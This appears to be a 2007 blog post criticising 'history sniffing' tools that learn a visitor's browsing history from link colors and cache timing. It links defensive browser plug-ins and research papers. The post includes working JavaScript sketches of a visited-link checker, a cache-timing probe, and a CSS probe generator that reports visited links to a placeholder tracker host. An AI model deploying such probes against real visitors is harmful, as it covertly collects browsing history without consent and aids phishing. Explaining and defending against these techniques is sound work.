I found an interesting tool via Seobook.com. It exploits a “feature” of current browsers: they do not properly partition persistent client-side state (visited links and cache contents) on a per-site basis.
The tool can identify URLs in your visitors’ browsing history. Aaron suggests using this to check whether your visitors come from competing sites and to adjust your marketing strategy accordingly.
This might not work as Aaron expects. You can only tell that the visitor visited those URLs at some point in the last n days (where n is the number of days the user keeps in his or her browsing history). You won’t be able to tell when, how often or how recently those URLs were visited.
While this is very useful for marketing purposes, it also leaves a huge window open for abuse. Collecting information on users without their consent doesn’t sound very good either.
Reader Dave comments:
I’ve always been conscious of the technical possibility of this and taken some safeguards against it. Still, as a user, I’d be furious if I knew this technique were being used on me, and I will be keeping my eye out for any precedent-setting legal challenges to this.
As a publisher/affiliate, I refuse to stoop this low. It’s disappointing but not unexpected that a great deal of readers here would be so sanguine about something so blatantly unethical.
Your user’s history object is none of your [edited] business.
Imagine a phisher that uses this to identify the on-line bank you use. With this information, his scam will be far more effective. Most people ignore emails from institutions they are not affiliated with.
Another reader pointed to a Firefox plug-in that solves the visited-link based attack problem. Here is another plug-in that prevents cache-based attacks. I installed both of them immediately.
The tool Aaron mentions exploits the visited-link vulnerability. Here is how it works:
Your browser, by default, displays visited links in a different color from unvisited ones. That information is available via CSS and client-side Javascript. The script works by pulling a list of target URLs using Ajax (this happens with no user action), inspecting the color of each link and flagging the ones that have the visited-link color. These are the ones the visitor has previously visited.
if (link.currentStyle) {
  var color = link.currentStyle.color;
  /* Here is the color inspection */
  if (color == '#ff0000')
    return true;
  return false;
}
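To make the idea concrete, here is a minimal sketch of the whole check. It is not the tool's actual code. It assumes the page styles visited links with a known color (for example a:visited { color: #ff0000 }). The names findVisitedUrls, normalizeColor and readColorFromDom are ones I made up for illustration, and the color-reading step is passed in as a function so the logic can be tried outside a browser.

```javascript
// Sketch only: all function names here are hypothetical, not taken from the tool.

// Strip whitespace and case so '#FF0000' and '#ff0000' compare equal.
function normalizeColor(color) {
  return String(color).replace(/\s+/g, '').toLowerCase();
}

// Return the URLs whose link color matches the visited-link color.
// readColor(url) must return the color the browser reports for a link to url.
function findVisitedUrls(urls, readColor, visitedColor) {
  var wanted = normalizeColor(visitedColor);
  return urls.filter(function (url) {
    return normalizeColor(readColor(url)) === wanted;
  });
}

// Browser-only color reader: adds a temporary link and inspects its style.
// Assumes a stylesheet on the page gives a:visited a distinctive color.
function readColorFromDom(url) {
  var link = document.createElement('a');
  link.href = url;
  document.body.appendChild(link);
  var style = link.currentStyle || window.getComputedStyle(link, null);
  var color = style.color;
  document.body.removeChild(link);
  return color;
}
```

In a browser the call would look like findVisitedUrls(targetUrls, readColorFromDom, '#ff0000'). The visited color has to be written the way the browser reports it: currentStyle tends to return the value as written in the stylesheet, while getComputedStyle typically returns an rgb(...) string.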
This is possible because browsers do not check that a page showing a link as visited is in the same domain as the link’s target. It is very likely this will be fixed in future browser releases.
It might seem that disabling Javascript solves the problem, but the same trick can be done with CSS alone. See https://www.indiana.edu/~phishing/browser-recon
Another form of attack, not used by the tool, is measuring the time the browser takes to open target URLs. URLs that have been visited are generally cached and load faster. By comparing load times, one can tell whether a page was visited or not.
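One way a CSS-only version could work, as far as I understand it, is to give each target link a :visited rule that loads a background image from the attacker's server, so the browser itself reports the hit. The sketch below only generates such a stylesheet as text. The function name buildProbeCss, the id field and the tracker.example address are all my own assumptions, and I have not checked that the page linked above does it exactly this way.

```javascript
// Sketch only: buildProbeCss and the report URL format are hypothetical.
// Each target needs a matching <a id="..." href="..."> element on the page.
// Ids are assumed to be simple CSS identifiers (letters and digits).
function buildProbeCss(targets, reportUrl) {
  return targets.map(function (target) {
    // The image is requested only if the browser treats the link as visited.
    return '#' + target.id + ':visited { background-image: url("' +
      reportUrl + '?id=' + encodeURIComponent(target.id) + '"); }';
  }).join('\n');
}
```

For example, buildProbeCss([{ id: 'bank1' }], 'http://tracker.example/hit') yields a single rule for #bank1:visited, and a request for that image in the server log would suggest the link was visited.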
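A rough sketch of the timing comparison follows. It assumes the attacker already has two reference timings, one for a resource known to be cached and one for a resource known not to be, and simply splits the difference. The names looksCached and timeImageLoad and the midpoint threshold are my own illustration, not something taken from the tool or the papers.

```javascript
// Sketch only: function names and the midpoint threshold are assumptions.

// Guess whether a load was served from cache by comparing it with
// reference timings for a known-cached and a known-uncached resource.
function looksCached(elapsedMs, cachedMs, uncachedMs) {
  var threshold = (cachedMs + uncachedMs) / 2;
  return elapsedMs < threshold;
}

// Browser-only helper: time how long an image takes to load (or fail).
function timeImageLoad(url, callback) {
  var img = new Image();
  var start = new Date().getTime();
  img.onload = img.onerror = function () {
    callback(new Date().getTime() - start);
  };
  img.src = url;
}
```

Keep in mind that timing a load also puts the resource in the cache, so each URL can only be measured meaningfully once.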
The plug-ins mentioned above protect from both types of attacks.
For more information visit: http://crypto.stanford.edu/sameorigin/
See also these papers for more background information:
Protecting browser state from web privacy attacks
Invasive browser sniffing and counter measures
Timing attacks on web privacy
Ramon Gallardo C.
June 4, 2007 at 3:20 am
Excellent post! I totally agree, this goes far beyond obtaining user information, it's right up there with invasion on privacy!!